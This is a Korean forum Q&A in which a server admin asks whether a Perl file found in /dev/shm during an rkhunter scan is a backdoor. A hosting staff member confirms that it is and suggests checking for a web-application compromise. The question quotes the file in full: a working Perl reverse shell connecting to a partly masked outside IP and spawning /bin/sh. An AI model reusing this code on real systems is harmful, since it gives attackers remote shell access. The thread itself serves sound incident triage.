펄 프로그램인데 백도어가 맞는지

안녕하십니까? 오늘과내일의 홍석범입니다.

/dev/shm에 파일이 있다는 것만으로도 비정상적이며 백도어 파일이 맞습니다.
해당 파일의 소유권자가 웹서버실행권한이라면 웹해킹(제로보드등) 여부를 확인해 보셔야 합니다.

감사합니다.

alkade 님의 글

안녕하세요? rkhutner 로 서버 점검을 하던중 /dev/shm /디렉토리에서 파일을 발견 하였습니다.

파일 내용은

#!/usr/bin/perl
use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(3303 ,inet_aton("xxx.xx.9.226"   )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";

궁금한 점이 이게 백도어가 맞느냐 아님 그냥 시스템 파일이냐가 궁금합니다.